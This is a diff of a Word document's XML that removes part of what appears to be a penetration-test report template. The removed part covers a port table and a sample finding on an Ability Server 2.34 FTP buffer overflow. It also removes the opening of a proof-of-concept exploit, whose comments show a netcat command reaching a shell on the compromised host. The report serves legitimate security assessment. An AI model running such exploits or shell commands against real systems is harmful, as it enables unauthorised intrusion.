-              <w:left w:w="80" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:right w:w="80" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t>TCP:</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> 22,55,90,8080,80</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="947"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4727" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:left w:w="80" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:right w:w="80" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t>192.168.1.3</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4727" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:left w:w="80" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:right w:w="80" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t>TCP:</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> 1433,3389 </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t xml:space="preserve">UDP: </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t>1434,161</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc59959355"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>3.3 Sample Report – Penetration</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="9"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems. During this penetration test, John was able to successfully gain access to 10 out of the 50 systems.</w:t>
+        <w:t xml:space="preserve">The penetration testing portions of the assessment focus heavily on gaining access to a variety of </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8682,2655 +9605,7 @@
               <w:pStyle w:val="BodyA"/>
               <w:spacing w:line="360" w:lineRule="auto"/>
               <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-              </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t xml:space="preserve">System Vulnerable: </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t>172.16.203.134</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t>Vulnerability Explanation</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t xml:space="preserve">: Ability Server 2.34 is subject to a buffer overflow vulnerability in STOR field. Attackers can use this vulnerability to cause arbitrary remote code execution and take completely control over the system. When performing the penetration test, John noticed an outdated version of Ability Server running from the service enumeration phase. In addition, the operating system was different from the known public exploit. A rewritten exploit was needed </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t>in order for</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> successful code execution to occur. Once the exploit was rewritten, a targeted attack was performed on the system which gave John full administrative access over the system.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t>Vulnerability Fix</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t xml:space="preserve">: The publishers of the Ability Server have issued a patch to fix this known issue. It can be found here: </w:t>
-            </w:r>
-            <w:hyperlink r:id="rId10" w:history="1">
-              <w:r>
-                <w:rPr>
-                  <w:rStyle w:val="Hyperlink0"/>
-                  <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-                </w:rPr>
-                <w:t>http://www.code-crafters.com/abilityserver/</w:t>
-              </w:r>
-            </w:hyperlink>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Severity: </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-                <w:color w:val="FF0000"/>
-                <w:u w:color="FF0000"/>
-              </w:rPr>
-              <w:t>Critical</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Proof of Concept Code Here:  </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t>Modifications to the existing exploit was needed and is highlighted in red.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>###################################</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"># Ability Server 2.34 FTP STOR Buffer Overflow   </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"># Advanced, </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>secure</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> and easy to use FTP Server. </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"># 21 Oct 2004 - </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>muts</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">                                      </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>###################################</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"># D:\BO&gt;ability-2.34-ftp-stor.py                       </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>###################################</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"># D:\data\tools&gt;nc -v 127.0.0.1 4444               </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"># localhost [127.0.0.1] 4444 (?) open               </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"># Microsoft Windows XP [Version 5.1.2600]        </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"># (C) Copyright 1985-2001 Microsoft Corp.        </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t># D:\Program Files\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>abilitywebserver</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">&gt;                </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
